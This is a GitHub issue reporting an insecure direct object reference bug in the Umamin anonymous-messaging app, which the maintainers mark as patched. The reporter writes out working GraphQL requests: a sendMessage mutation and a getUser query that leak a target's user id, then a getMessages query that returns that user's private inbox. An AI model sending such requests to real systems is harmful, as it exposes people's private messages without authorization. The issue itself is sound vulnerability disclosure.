Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

I can read anyone's private Umamin inbox with a little tinkering to the original GraphQL request #59

Closed
jmrcsnchz opened this issue Jul 28, 2022 · 4 comments
Closed

I can read anyone's private Umamin inbox with a little tinkering to the original GraphQL request #59

jmrcsnchz opened this issue Jul 28, 2022 · 4 comments
Labels
bug Something isn't working

Comments

@jmrcsnchz
Copy link

Describe the bug
This vulnerability/bug is also known as Insecure Direct Object References (IDOR) Bug. This bug allows unauthorized users to view anyone's Private Messages by obtaining the target user's receiverId/userId

To Reproduce
Steps to reproduce the behavior:

  1. the endoint /api/graphql is the one vulnerable to this attack
  2. My POST request data is as follows:
{"query":"mutation sendMessage($input: SendMessageInput!) {\n  sendMessage(input: $input) {\n     id\n    receiverId\n    content\n  }\n}\n","variables":{"input":{"receiverUsername":"TARGET_USERNAME","content":"CONTENT_HERE","receiverMsg":"Send me an anonymous message!"}},"operationName":"sendMessage"}
  1. (Explanation to the request above) I just added receiverId variable to the original graphQL request.
  2. The endpoint will unexpectedly respond with the private receiverId value like below:
{"data":{"sendMessage":{"id":"yyyyy-yyy-yyyy-yyyy-yyyyyy","receiverId":"xxxxxx-xxx-xxxx-xxxx-xxxxxx","content":"CONTENT_HERE"}}}
  1. Now , send another POST request to the same endpoint /api/graphql
{"query":"query getMessages($userId: ID!) {\n  messages(userId: $userId) {\n    id\n    content\n    isOpened\n    receiverMsg\n  }\n}\n","variables":{"userId":"THE_RECEIVERID_YOU_OBTAINED_EARLIER"},"operationName":"getMessages"}
  1. The endpoint will respond with the private messages corresponding to the userId you obtained
{"data":{"messages":[{"id":"yyyyy-yyy-yyyy-yyyy-yyyyyy","content":"vvvvvvvvvv","isOpened":false,"receiverMsg":"Send me an anonymous message!"},{"id":"yyyyy-yyy-yyyy-yyyy-yyyyyy","content":"vvvvvvvvvv","isOpened":true,"receiverMsg":"Send me an anonymous message!"}]}}

Expected behavior
This endpoint should return an error and not allow anyone to just grab other's private userId AND/OR the endpoint should not allow the use of any valid userId to non-authorized users
@jmrcsnchz jmrcsnchz added the bug Something isn't working label Jul 28, 2022
@princejoogie
Copy link
Member

@joshxfi u can use current session to verify request

@jmrcsnchz
Copy link
Author

Found an easier method using the getUser operation

{"query":"query getUser($username: String!) {\n  user(username: $username) {\n     id\n    message\n  }\n}\n","variables":{"username":"josh"},"operationName":"getUser"}

response

@joshxfi
Copy link
Member

joshxfi commented Jul 29, 2022

@jmrcsnchz Thanks a lot for reporting this! I'll look into it

@joshxfi
Copy link
Member

joshxfi commented Jul 29, 2022

patched: 8cfa2bc 22cf762

@joshxfi joshxfi closed this as completed Jul 29, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@princejoogie @joshxfi @jmrcsnchz